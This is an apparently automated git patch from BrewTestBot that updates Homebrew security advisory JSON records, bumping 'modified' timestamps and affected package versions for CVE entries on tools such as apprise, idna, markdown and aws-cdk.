From 151d95c5a487634df495e309de762c5f3eb4e477 Mon Sep 17 00:00:00 2001 From: BrewTestBot <1589480+BrewTestBot@users.noreply.github.com> Date: Sat, 22 Aug 2026 09:53:32 +0000 Subject: [PATCH] Matched advisory candidates Base: 3153c8c8563ea6f7cd4cb3ed48463fe985301e80 --- advisories/BREW-apprise-CVE-2021-39229.json | 10 +- advisories/BREW-apprise-CVE-2024-3651.json | 12 +- advisories/BREW-apprise-CVE-2025-69534.json | 12 +- advisories/BREW-apprise-CVE-2026-45409.json | 12 +- advisories/BREW-aws-cdk-CVE-2024-45037.json | 8 +- advisories/BREW-aws-cdk-CVE-2025-2598.json | 8 +- advisories/BREW-azure-cli-CVE-2026-13346.json | 75 ++++++++ advisories/BREW-badkeys-CVE-2026-21439.json | 12 +- advisories/BREW-bashly-CVE-2018-1000201.json | 88 +++++++++ advisories/BREW-bashly-CVE-2020-14001.json | 128 +++++++++++++ advisories/BREW-bashly-CVE-2021-28834.json | 108 +++++++++++ advisories/BREW-bashly-CVE-2021-28965.json | 126 +++++++++++++ advisories/BREW-bashly-CVE-2024-35176.json | 92 +++++++++ advisories/BREW-bashly-CVE-2024-39908.json | 100 ++++++++++ advisories/BREW-bashly-CVE-2024-41123.json | 104 ++++++++++ advisories/BREW-bashly-CVE-2024-41946.json | 104 ++++++++++ advisories/BREW-bashly-CVE-2024-43398.json | 104 ++++++++++ advisories/BREW-bashly-CVE-2024-49761.json | 101 ++++++++++ advisories/BREW-bashly-CVE-2025-58767.json | 88 +++++++++ advisories/BREW-bashly-CVE-2026-41316.json | 80 ++++++++ advisories/BREW-bbot-CVE-2026-14966.json | 71 +++++++ advisories/BREW-bbot-CVE-2026-14967.json | 71 +++++++ .../BREW-charmcraft-CVE-2026-59939.json | 6 +- advisories/BREW-checkov-CVE-2026-55244.json | 81 ++++++++ .../BREW-checkov-GHSA-9w56-46f6-3qhx.json | 80 ++++++++ ...REW-cloudflare-wrangler-CVE-2023-3348.json | 6 +- ...REW-cloudflare-wrangler-CVE-2023-7079.json | 6 +- ...REW-cloudflare-wrangler-CVE-2023-7080.json | 6 +- ...REW-cloudflare-wrangler-CVE-2026-0933.json | 6 +- advisories/BREW-copier-CVE-2015-8557.json | 12 +- advisories/BREW-copier-CVE-2021-20270.json | 12 +- advisories/BREW-copier-CVE-2021-27291.json | 12 +- advisories/BREW-copier-CVE-2022-40896.json | 12 +- advisories/BREW-copier-CVE-2025-55201.json | 10 +- advisories/BREW-copier-CVE-2025-55214.json | 10 +- advisories/BREW-copier-CVE-2026-23968.json | 10 +- advisories/BREW-copier-CVE-2026-23986.json | 10 +- advisories/BREW-copier-CVE-2026-34726.json | 10 +- advisories/BREW-copier-CVE-2026-34730.json | 10 +- advisories/BREW-copier-CVE-2026-4539.json | 12 +- advisories/BREW-copier-CVE-2026-53951.json | 6 +- .../BREW-cve-bin-tool-CVE-2026-59939.json | 6 +- advisories/BREW-defuddle-CVE-2026-61824.json | 81 ++++++++ advisories/BREW-dstack-CVE-2015-8557.json | 12 +- advisories/BREW-dstack-CVE-2020-7694.json | 12 +- advisories/BREW-dstack-CVE-2020-7695.json | 12 +- advisories/BREW-dstack-CVE-2021-20270.json | 12 +- advisories/BREW-dstack-CVE-2021-27291.json | 12 +- advisories/BREW-dstack-CVE-2022-40896.json | 12 +- advisories/BREW-dstack-CVE-2024-3651.json | 12 +- advisories/BREW-dstack-CVE-2026-28684.json | 12 +- advisories/BREW-dstack-CVE-2026-4539.json | 12 +- advisories/BREW-dstack-CVE-2026-45409.json | 12 +- advisories/BREW-dstack-CVE-2026-59939.json | 6 +- advisories/BREW-duplicity-CVE-2026-59939.json | 6 +- advisories/BREW-dvc-CVE-2026-59939.json | 6 +- advisories/BREW-dvc-CVE-2026-68508.json | 88 +++++++++ advisories/BREW-esphome-CVE-2015-8557.json | 12 +- advisories/BREW-esphome-CVE-2021-20270.json | 12 +- advisories/BREW-esphome-CVE-2021-27291.json | 12 +- advisories/BREW-esphome-CVE-2021-41104.json | 12 +- advisories/BREW-esphome-CVE-2022-40896.json | 12 +- advisories/BREW-esphome-CVE-2024-27081.json | 12 +- advisories/BREW-esphome-CVE-2024-27287.json | 12 +- advisories/BREW-esphome-CVE-2024-29019.json | 12 +- advisories/BREW-esphome-CVE-2024-3651.json | 12 +- advisories/BREW-esphome-CVE-2025-57808.json | 12 +- advisories/BREW-esphome-CVE-2025-68146.json | 12 +- advisories/BREW-esphome-CVE-2026-22701.json | 12 +- advisories/BREW-esphome-CVE-2026-23833.json | 12 +- advisories/BREW-esphome-CVE-2026-4539.json | 12 +- advisories/BREW-esphome-CVE-2026-45409.json | 12 +- .../BREW-firebase-cli-CVE-2024-4128.json | 6 +- advisories/BREW-gcalcli-CVE-2026-59939.json | 6 +- advisories/BREW-gptme-CVE-2015-8557.json | 12 +- advisories/BREW-gptme-CVE-2020-7694.json | 12 +- advisories/BREW-gptme-CVE-2020-7695.json | 12 +- advisories/BREW-gptme-CVE-2021-20270.json | 12 +- advisories/BREW-gptme-CVE-2021-27291.json | 12 +- advisories/BREW-gptme-CVE-2022-40896.json | 12 +- advisories/BREW-gptme-CVE-2023-29159.json | 12 +- advisories/BREW-gptme-CVE-2023-30798.json | 12 +- advisories/BREW-gptme-CVE-2024-3651.json | 12 +- advisories/BREW-gptme-CVE-2024-47874.json | 12 +- advisories/BREW-gptme-CVE-2025-54121.json | 12 +- advisories/BREW-gptme-CVE-2025-62727.json | 12 +- advisories/BREW-gptme-CVE-2026-28684.json | 12 +- advisories/BREW-gptme-CVE-2026-34450.json | 12 +- advisories/BREW-gptme-CVE-2026-34452.json | 12 +- advisories/BREW-gptme-CVE-2026-4539.json | 12 +- advisories/BREW-gptme-CVE-2026-45409.json | 12 +- advisories/BREW-gptme-CVE-2026-48710.json | 12 +- advisories/BREW-gptme-CVE-2026-48817.json | 12 +- advisories/BREW-gptme-CVE-2026-48818.json | 12 +- advisories/BREW-gptme-CVE-2026-54282.json | 12 +- advisories/BREW-gptme-CVE-2026-54283.json | 12 +- advisories/BREW-gptme-CVE-2026-58203.json | 8 +- advisories/BREW-gyb-CVE-2026-59939.json | 6 +- .../BREW-hermes-agent-CVE-2015-8557.json | 12 +- .../BREW-hermes-agent-CVE-2020-7694.json | 12 +- .../BREW-hermes-agent-CVE-2020-7695.json | 12 +- .../BREW-hermes-agent-CVE-2021-20270.json | 12 +- .../BREW-hermes-agent-CVE-2021-27291.json | 12 +- .../BREW-hermes-agent-CVE-2022-40896.json | 12 +- .../BREW-hermes-agent-CVE-2024-3651.json | 12 +- .../BREW-hermes-agent-CVE-2026-4539.json | 12 +- .../BREW-hermes-agent-CVE-2026-45409.json | 12 +- .../BREW-internetarchive-CVE-2016-10075.json | 12 +- .../BREW-internetarchive-CVE-2024-34062.json | 12 +- .../BREW-internetarchive-CVE-2024-3651.json | 12 +- .../BREW-internetarchive-CVE-2025-58438.json | 18 +- .../BREW-internetarchive-CVE-2026-45409.json | 12 +- ...BREW-mcp-google-sheets-CVE-2026-59939.json | 6 +- .../BREW-mcp-inspector-CVE-2025-49596.json | 6 +- .../BREW-mcp-inspector-CVE-2025-58444.json | 6 +- advisories/BREW-mesa-CVE-2010-2480.json | 12 +- advisories/BREW-mesa-CVE-2022-40023.json | 12 +- advisories/BREW-mesa-CVE-2026-41205.json | 12 +- advisories/BREW-mesa-CVE-2026-44307.json | 12 +- .../BREW-mistral-vibe-CVE-2022-24439.json | 12 +- .../BREW-mistral-vibe-CVE-2023-40267.json | 12 +- .../BREW-mistral-vibe-CVE-2023-40590.json | 12 +- .../BREW-mistral-vibe-CVE-2023-41040.json | 12 +- .../BREW-mistral-vibe-CVE-2024-22190.json | 12 +- .../BREW-mistral-vibe-CVE-2026-42215.json | 12 +- .../BREW-mistral-vibe-CVE-2026-42284.json | 12 +- .../BREW-mistral-vibe-CVE-2026-44243.json | 12 +- .../BREW-mistral-vibe-CVE-2026-44244.json | 12 +- .../BREW-mistral-vibe-CVE-2026-67322.json | 8 +- .../BREW-mistral-vibe-CVE-2026-67323.json | 8 +- .../BREW-mistral-vibe-CVE-2026-67324.json | 8 +- .../BREW-mistral-vibe-CVE-2026-67325.json | 8 +- .../BREW-mistral-vibe-CVE-2026-67326.json | 8 +- .../BREW-mistral-vibe-CVE-2026-69097.json | 8 +- .../BREW-mistral-vibe-CVE-2026-73619.json | 8 +- .../BREW-mistral-vibe-CVE-2026-73620.json | 8 +- .../BREW-mistral-vibe-CVE-2026-73621.json | 8 +- .../BREW-mistral-vibe-CVE-2026-73622.json | 8 +- .../BREW-mistral-vibe-CVE-2026-73623.json | 8 +- .../BREW-mistral-vibe-CVE-2026-73624.json | 8 +- .../BREW-mistral-vibe-CVE-2026-73625.json | 8 +- .../BREW-mistral-vibe-CVE-2026-76217.json | 12 +- .../BREW-mistral-vibe-CVE-2026-76218.json | 12 +- .../BREW-mistral-vibe-CVE-2026-76219.json | 12 +- .../BREW-mistral-vibe-CVE-2026-76220.json | 12 +- .../BREW-mistral-vibe-CVE-2026-76221.json | 12 +- .../BREW-mistral-vibe-CVE-2026-76222.json | 12 +- advisories/BREW-mycli-CVE-2023-44690.json | 14 +- advisories/BREW-mycli-CVE-2024-3651.json | 12 +- advisories/BREW-mycli-CVE-2026-45409.json | 12 +- advisories/BREW-n8n-mcp-CVE-2026-39974.json | 6 +- advisories/BREW-n8n-mcp-CVE-2026-41495.json | 6 +- advisories/BREW-n8n-mcp-CVE-2026-42282.json | 6 +- advisories/BREW-n8n-mcp-CVE-2026-42449.json | 6 +- advisories/BREW-n8n-mcp-CVE-2026-44694.json | 6 +- advisories/BREW-n8n-mcp-CVE-2026-45582.json | 6 +- advisories/BREW-n8n-mcp-CVE-2026-45707.json | 6 +- advisories/BREW-n8n-mcp-CVE-2026-54052.json | 6 +- advisories/BREW-n8n-mcp-CVE-2026-55608.json | 6 +- .../BREW-n8n-mcp-GHSA-75hx-xj24-mqrw.json | 6 +- .../BREW-n8n-mcp-GHSA-8g7g-hmwm-6rv2.json | 6 +- .../BREW-parsedmarc-CVE-2026-59939.json | 6 +- advisories/BREW-pillow-CVE-2026-40192.json | 6 +- advisories/BREW-pipenv-CVE-2011-4617.json | 12 +- advisories/BREW-pipenv-CVE-2013-1633.json | 12 +- advisories/BREW-pipenv-CVE-2022-21668.json | 20 +- advisories/BREW-pipenv-CVE-2022-40897.json | 12 +- advisories/BREW-pipenv-CVE-2024-53899.json | 12 +- advisories/BREW-pipenv-CVE-2024-6345.json | 12 +- advisories/BREW-pipenv-CVE-2025-47273.json | 12 +- advisories/BREW-pipenv-CVE-2025-68146.json | 12 +- advisories/BREW-pipenv-CVE-2026-22701.json | 12 +- advisories/BREW-pipenv-CVE-2026-22702.json | 12 +- advisories/BREW-pipenv-CVE-2026-59890.json | 12 +- advisories/BREW-prowler-CVE-2026-59939.json | 6 +- advisories/BREW-pulp-cli-CVE-2024-3651.json | 12 +- advisories/BREW-pulp-cli-CVE-2026-45409.json | 12 +- advisories/BREW-pypy-CVE-2026-13346.json | 72 +++++++ advisories/BREW-pypy3.10-CVE-2026-13346.json | 72 +++++++ advisories/BREW-pypy3.11-CVE-2026-13346.json | 72 +++++++ advisories/BREW-pypy3.9-CVE-2026-13346.json | 72 +++++++ ...W-python-freethreading-CVE-2026-13346.json | 75 ++++++++ .../BREW-python@3.10-CVE-2026-13346.json | 75 ++++++++ .../BREW-python@3.11-CVE-2026-13346.json | 75 ++++++++ .../BREW-python@3.12-CVE-2026-13346.json | 75 ++++++++ .../BREW-python@3.13-CVE-2026-13346.json | 75 ++++++++ .../BREW-python@3.14-CVE-2026-13346.json | 75 ++++++++ .../BREW-python@3.9-CVE-2026-13346.json | 72 +++++++ advisories/BREW-rapid-mlx-CVE-2020-7694.json | 12 +- advisories/BREW-rapid-mlx-CVE-2020-7695.json | 12 +- advisories/BREW-renovate-CVE-2024-58376.json | 8 +- advisories/BREW-renovate-CVE-2026-76226.json | 8 +- advisories/BREW-renovate-CVE-2026-76227.json | 8 +- advisories/BREW-renovate-CVE-2026-76228.json | 8 +- advisories/BREW-renovate-CVE-2026-76229.json | 16 +- advisories/BREW-renovate-CVE-2026-76230.json | 24 +-- advisories/BREW-renovate-CVE-2026-76231.json | 32 ++-- advisories/BREW-renovate-CVE-2026-76232.json | 24 +-- advisories/BREW-renovate-CVE-2026-76233.json | 16 +- .../BREW-renovate-GHSA-36rh-ggpr-j3gj.json | 6 +- .../BREW-renovate-GHSA-v7x3-7hw7-pcjg.json | 6 +- advisories/BREW-rockcraft-CVE-2026-59939.json | 6 +- advisories/BREW-rollup-CVE-2024-47068.json | 6 +- advisories/BREW-rollup-CVE-2026-27606.json | 6 +- advisories/BREW-scdl-CVE-2015-8557.json | 12 +- advisories/BREW-scdl-CVE-2021-20270.json | 12 +- advisories/BREW-scdl-CVE-2021-27291.json | 12 +- advisories/BREW-scdl-CVE-2022-40896.json | 12 +- advisories/BREW-scdl-CVE-2023-35934.json | 12 +- advisories/BREW-scdl-CVE-2023-40581.json | 12 +- advisories/BREW-scdl-CVE-2023-46121.json | 12 +- advisories/BREW-scdl-CVE-2024-22423.json | 12 +- advisories/BREW-scdl-CVE-2024-38519.json | 12 +- advisories/BREW-scdl-CVE-2026-26331.json | 12 +- advisories/BREW-scdl-CVE-2026-4539.json | 12 +- advisories/BREW-scdl-CVE-2026-50019.json | 12 +- advisories/BREW-scdl-CVE-2026-50023.json | 12 +- advisories/BREW-scdl-CVE-2026-50574.json | 12 +- advisories/BREW-scdl-CVE-2026-55404.json | 12 +- advisories/BREW-scdl-GHSA-3v33-3wmw-3785.json | 8 +- advisories/BREW-scdl-GHSA-69qj-pvh9-c5wg.json | 8 +- .../BREW-schemathesis-CVE-2015-8557.json | 12 +- .../BREW-schemathesis-CVE-2021-20270.json | 12 +- .../BREW-schemathesis-CVE-2021-27291.json | 12 +- .../BREW-schemathesis-CVE-2022-40896.json | 12 +- .../BREW-schemathesis-CVE-2023-29159.json | 12 +- .../BREW-schemathesis-CVE-2023-30798.json | 12 +- .../BREW-schemathesis-CVE-2024-3651.json | 12 +- .../BREW-schemathesis-CVE-2024-47874.json | 12 +- .../BREW-schemathesis-CVE-2025-54121.json | 12 +- .../BREW-schemathesis-CVE-2025-62727.json | 12 +- .../BREW-schemathesis-CVE-2026-4539.json | 12 +- .../BREW-schemathesis-CVE-2026-45409.json | 12 +- .../BREW-schemathesis-CVE-2026-48710.json | 12 +- .../BREW-schemathesis-CVE-2026-48817.json | 12 +- .../BREW-schemathesis-CVE-2026-48818.json | 12 +- .../BREW-schemathesis-CVE-2026-54282.json | 12 +- .../BREW-schemathesis-CVE-2026-54283.json | 12 +- .../BREW-scoutsuite-CVE-2026-59939.json | 6 +- advisories/BREW-scrapy-CVE-2013-4314.json | 12 +- advisories/BREW-scrapy-CVE-2014-3146.json | 12 +- advisories/BREW-scrapy-CVE-2017-14158.json | 18 +- advisories/BREW-scrapy-CVE-2018-1000807.json | 12 +- advisories/BREW-scrapy-CVE-2018-1000808.json | 12 +- advisories/BREW-scrapy-CVE-2018-19787.json | 12 +- advisories/BREW-scrapy-CVE-2020-27783.json | 12 +- advisories/BREW-scrapy-CVE-2020-36846.json | 177 ++++++++++++++++++ advisories/BREW-scrapy-CVE-2021-28957.json | 12 +- advisories/BREW-scrapy-CVE-2021-41125.json | 20 +- advisories/BREW-scrapy-CVE-2021-43818.json | 12 +- advisories/BREW-scrapy-CVE-2022-0577.json | 20 +- advisories/BREW-scrapy-CVE-2022-2309.json | 12 +- advisories/BREW-scrapy-CVE-2024-1892.json | 20 +- advisories/BREW-scrapy-CVE-2024-1968.json | 20 +- advisories/BREW-scrapy-CVE-2024-3572.json | 18 +- advisories/BREW-scrapy-CVE-2024-3574.json | 18 +- advisories/BREW-scrapy-CVE-2024-3651.json | 12 +- advisories/BREW-scrapy-CVE-2025-6176.json | 26 ++- advisories/BREW-scrapy-CVE-2025-68146.json | 12 +- advisories/BREW-scrapy-CVE-2026-22701.json | 12 +- advisories/BREW-scrapy-CVE-2026-27448.json | 12 +- advisories/BREW-scrapy-CVE-2026-27459.json | 12 +- advisories/BREW-scrapy-CVE-2026-41066.json | 12 +- advisories/BREW-scrapy-CVE-2026-45409.json | 12 +- .../BREW-scrapy-GHSA-23j4-mw76-5v7h.json | 6 +- .../BREW-scrapy-GHSA-9x8m-2xpf-crp3.json | 6 +- .../BREW-scrapy-GHSA-cwxj-rr6w-m6w7.json | 6 +- .../BREW-scrapy-GHSA-jm3v-qxmh-hxwv.json | 6 +- .../BREW-scrapy-GHSA-mfjm-vh54-3f96.json | 6 +- advisories/BREW-semgrep-CVE-2015-8557.json | 12 +- advisories/BREW-semgrep-CVE-2020-7694.json | 12 +- advisories/BREW-semgrep-CVE-2020-7695.json | 12 +- advisories/BREW-semgrep-CVE-2021-20270.json | 12 +- advisories/BREW-semgrep-CVE-2021-27291.json | 12 +- advisories/BREW-semgrep-CVE-2022-40896.json | 12 +- advisories/BREW-semgrep-CVE-2024-3651.json | 12 +- advisories/BREW-semgrep-CVE-2026-28684.json | 12 +- advisories/BREW-semgrep-CVE-2026-4539.json | 12 +- advisories/BREW-semgrep-CVE-2026-45409.json | 12 +- advisories/BREW-snapcraft-CVE-2026-59939.json | 6 +- .../BREW-snyk-agent-scan-CVE-2015-8557.json | 12 +- .../BREW-snyk-agent-scan-CVE-2020-7694.json | 12 +- .../BREW-snyk-agent-scan-CVE-2020-7695.json | 12 +- .../BREW-snyk-agent-scan-CVE-2021-20270.json | 12 +- .../BREW-snyk-agent-scan-CVE-2021-27291.json | 12 +- .../BREW-snyk-agent-scan-CVE-2022-40896.json | 12 +- .../BREW-snyk-agent-scan-CVE-2024-3651.json | 12 +- .../BREW-snyk-agent-scan-CVE-2026-28684.json | 12 +- .../BREW-snyk-agent-scan-CVE-2026-4539.json | 12 +- .../BREW-snyk-agent-scan-CVE-2026-45409.json | 12 +- .../BREW-style-dictionary-CVE-2026-54639.json | 6 +- advisories/BREW-summarize-CVE-2026-53782.json | 96 ++++++++++ advisories/BREW-torrra-CVE-2015-8557.json | 12 +- advisories/BREW-torrra-CVE-2021-20270.json | 12 +- advisories/BREW-torrra-CVE-2021-27291.json | 12 +- advisories/BREW-torrra-CVE-2022-40896.json | 12 +- advisories/BREW-torrra-CVE-2023-26302.json | 12 +- advisories/BREW-torrra-CVE-2023-26303.json | 12 +- advisories/BREW-torrra-CVE-2024-3651.json | 12 +- advisories/BREW-torrra-CVE-2026-4539.json | 16 +- advisories/BREW-torrra-CVE-2026-45409.json | 16 +- advisories/BREW-torrra-CVE-2026-7246.json | 12 +- .../BREW-translate-toolkit-CVE-2014-3146.json | 12 +- ...BREW-translate-toolkit-CVE-2018-19787.json | 12 +- ...BREW-translate-toolkit-CVE-2020-27783.json | 12 +- ...BREW-translate-toolkit-CVE-2021-28957.json | 12 +- ...BREW-translate-toolkit-CVE-2021-43818.json | 12 +- .../BREW-translate-toolkit-CVE-2022-2309.json | 12 +- ...BREW-translate-toolkit-CVE-2026-41066.json | 12 +- advisories/BREW-uvicorn-CVE-2020-7694.json | 16 +- advisories/BREW-uvicorn-CVE-2020-7695.json | 16 +- advisories/BREW-uvicorn-CVE-2024-3651.json | 12 +- advisories/BREW-uvicorn-CVE-2026-28684.json | 12 +- advisories/BREW-uvicorn-CVE-2026-45409.json | 12 +- advisories/BREW-vercel-CVE-2026-44479.json | 6 +- advisories/BREW-vite-CVE-2022-35204.json | 6 +- advisories/BREW-vite-CVE-2023-34092.json | 6 +- advisories/BREW-vite-CVE-2023-49293.json | 6 +- advisories/BREW-vite-CVE-2024-23331.json | 6 +- advisories/BREW-vite-CVE-2024-31207.json | 6 +- advisories/BREW-vite-CVE-2024-45811.json | 6 +- advisories/BREW-vite-CVE-2024-45812.json | 6 +- advisories/BREW-vite-CVE-2024-52011.json | 6 +- advisories/BREW-vite-CVE-2025-24010.json | 6 +- advisories/BREW-vite-CVE-2025-30208.json | 6 +- advisories/BREW-vite-CVE-2025-31125.json | 6 +- advisories/BREW-vite-CVE-2025-31486.json | 6 +- advisories/BREW-vite-CVE-2025-32395.json | 6 +- advisories/BREW-vite-CVE-2025-46565.json | 6 +- advisories/BREW-vite-CVE-2025-58751.json | 6 +- advisories/BREW-vite-CVE-2025-58752.json | 6 +- advisories/BREW-vite-CVE-2025-62522.json | 6 +- advisories/BREW-vite-CVE-2026-39363.json | 6 +- advisories/BREW-vite-CVE-2026-39364.json | 6 +- advisories/BREW-vite-CVE-2026-39365.json | 6 +- advisories/BREW-vite-CVE-2026-53571.json | 6 +- advisories/BREW-vite-CVE-2026-53632.json | 6 +- advisories/BREW-vnu-CVE-2025-15104.json | 6 +- advisories/BREW-yt-dlp-CVE-2018-1000518.json | 12 +- advisories/BREW-yt-dlp-CVE-2021-33880.json | 12 +- advisories/BREW-yt-dlp-CVE-2023-35934.json | 18 +- advisories/BREW-yt-dlp-CVE-2023-40581.json | 12 +- advisories/BREW-yt-dlp-CVE-2023-46121.json | 18 +- advisories/BREW-yt-dlp-CVE-2024-22423.json | 18 +- advisories/BREW-yt-dlp-CVE-2024-3651.json | 12 +- advisories/BREW-yt-dlp-CVE-2024-38519.json | 18 +- advisories/BREW-yt-dlp-CVE-2026-26331.json | 18 +- advisories/BREW-yt-dlp-CVE-2026-45409.json | 12 +- advisories/BREW-yt-dlp-CVE-2026-50019.json | 18 +- advisories/BREW-yt-dlp-CVE-2026-50023.json | 18 +- advisories/BREW-yt-dlp-CVE-2026-50574.json | 18 +- advisories/BREW-yt-dlp-CVE-2026-55404.json | 18 +- .../BREW-yt-dlp-GHSA-3v33-3wmw-3785.json | 6 +- .../BREW-yt-dlp-GHSA-69qj-pvh9-c5wg.json | 6 +- 354 files changed, 4664 insertions(+), 1739 deletions(-) create mode 100644 advisories/BREW-azure-cli-CVE-2026-13346.json create mode 100644 advisories/BREW-bashly-CVE-2018-1000201.json create mode 100644 advisories/BREW-bashly-CVE-2020-14001.json create mode 100644 advisories/BREW-bashly-CVE-2021-28834.json create mode 100644 advisories/BREW-bashly-CVE-2021-28965.json create mode 100644 advisories/BREW-bashly-CVE-2024-35176.json create mode 100644 advisories/BREW-bashly-CVE-2024-39908.json create mode 100644 advisories/BREW-bashly-CVE-2024-41123.json create mode 100644 advisories/BREW-bashly-CVE-2024-41946.json create mode 100644 advisories/BREW-bashly-CVE-2024-43398.json create mode 100644 advisories/BREW-bashly-CVE-2024-49761.json create mode 100644 advisories/BREW-bashly-CVE-2025-58767.json create mode 100644 advisories/BREW-bashly-CVE-2026-41316.json create mode 100644 advisories/BREW-bbot-CVE-2026-14966.json create mode 100644 advisories/BREW-bbot-CVE-2026-14967.json create mode 100644 advisories/BREW-checkov-CVE-2026-55244.json create mode 100644 advisories/BREW-checkov-GHSA-9w56-46f6-3qhx.json create mode 100644 advisories/BREW-defuddle-CVE-2026-61824.json create mode 100644 advisories/BREW-dvc-CVE-2026-68508.json create mode 100644 advisories/BREW-pypy-CVE-2026-13346.json create mode 100644 advisories/BREW-pypy3.10-CVE-2026-13346.json create mode 100644 advisories/BREW-pypy3.11-CVE-2026-13346.json create mode 100644 advisories/BREW-pypy3.9-CVE-2026-13346.json create mode 100644 advisories/BREW-python-freethreading-CVE-2026-13346.json create mode 100644 advisories/BREW-python@3.10-CVE-2026-13346.json create mode 100644 advisories/BREW-python@3.11-CVE-2026-13346.json create mode 100644 advisories/BREW-python@3.12-CVE-2026-13346.json create mode 100644 advisories/BREW-python@3.13-CVE-2026-13346.json create mode 100644 advisories/BREW-python@3.14-CVE-2026-13346.json create mode 100644 advisories/BREW-python@3.9-CVE-2026-13346.json create mode 100644 advisories/BREW-scrapy-CVE-2020-36846.json create mode 100644 advisories/BREW-summarize-CVE-2026-53782.json diff --git a/advisories/BREW-apprise-CVE-2021-39229.json b/advisories/BREW-apprise-CVE-2021-39229.json index 2e09c2876a0..71247df1da8 100644 --- a/advisories/BREW-apprise-CVE-2021-39229.json +++ b/advisories/BREW-apprise-CVE-2021-39229.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apprise-CVE-2021-39229", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-08-22T08:39:17Z", "upstream": [ "GHSA-qhmp-h54x-38qr", "CVE-2021-39229", @@ -44,15 +44,15 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "apprise", - "subject_version": "1.12.0", - "key": "pkg:pypi/apprise@1.12.0" + "subject_version": "1.13.0", + "key": "pkg:pypi/apprise@1.13.0" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "apprise", - "subject_version": "1.12.0", - "key": "pkg:pypi/apprise@1.12.0" + "subject_version": "1.13.0", + "key": "pkg:pypi/apprise@1.13.0" } ] }, diff --git a/advisories/BREW-apprise-CVE-2024-3651.json b/advisories/BREW-apprise-CVE-2024-3651.json index b80e3362ef0..3e473716843 100644 --- a/advisories/BREW-apprise-CVE-2024-3651.json +++ b/advisories/BREW-apprise-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apprise-CVE-2024-3651", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-08-22T08:39:17Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.7", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-apprise-CVE-2025-69534.json b/advisories/BREW-apprise-CVE-2025-69534.json index 76527af73dc..2e0410f7c85 100644 --- a/advisories/BREW-apprise-CVE-2025-69534.json +++ b/advisories/BREW-apprise-CVE-2025-69534.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apprise-CVE-2025-69534", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-08-22T08:39:17Z", "upstream": [ "GHSA-5wmx-573v-2qwq", "CVE-2025-69534", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.8.1", "resource": "markdown", - "resource_purl": "pkg:pypi/markdown@3.10.2" + "resource_purl": "pkg:pypi/markdown@3.10.3" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "markdown", - "subject_version": "3.10.2", - "key": "pkg:pypi/markdown@3.10.2", + "subject_version": "3.10.3", + "key": "pkg:pypi/markdown@3.10.3", "resource": "markdown" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "markdown", - "subject_version": "3.10.2", - "key": "pkg:pypi/markdown@3.10.2", + "subject_version": "3.10.3", + "key": "pkg:pypi/markdown@3.10.3", "resource": "markdown" } ] diff --git a/advisories/BREW-apprise-CVE-2026-45409.json b/advisories/BREW-apprise-CVE-2026-45409.json index 11e6edf0fde..6c41c0a2d1d 100644 --- a/advisories/BREW-apprise-CVE-2026-45409.json +++ b/advisories/BREW-apprise-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apprise-CVE-2026-45409", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-08-22T08:39:17Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.15", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-aws-cdk-CVE-2024-45037.json b/advisories/BREW-aws-cdk-CVE-2024-45037.json index 55d09dfd62d..b0058d97cb6 100644 --- a/advisories/BREW-aws-cdk-CVE-2024-45037.json +++ b/advisories/BREW-aws-cdk-CVE-2024-45037.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-cdk-CVE-2024-45037", "published": "2026-08-13T16:36:30Z", - "modified": "2026-08-19T08:40:15Z", + "modified": "2026-08-22T08:39:46Z", "upstream": [ "CVE-2024-45037", "GHSA-qj85-69xf-2vxq" @@ -43,15 +43,15 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/aws/aws-cdk", - "subject_version": "2.1137.0", + "subject_version": "2.1138.0", "key": "https://github.com/aws/aws-cdk" }, { "strategy": "registry", "ecosystem": "npm", "name": "aws-cdk", - "subject_version": "2.1137.0", - "key": "pkg:npm/aws-cdk@2.1137.0" + "subject_version": "2.1138.0", + "key": "pkg:npm/aws-cdk@2.1138.0" } ] }, diff --git a/advisories/BREW-aws-cdk-CVE-2025-2598.json b/advisories/BREW-aws-cdk-CVE-2025-2598.json index 0f2011da7b6..3d8a27a85a5 100644 --- a/advisories/BREW-aws-cdk-CVE-2025-2598.json 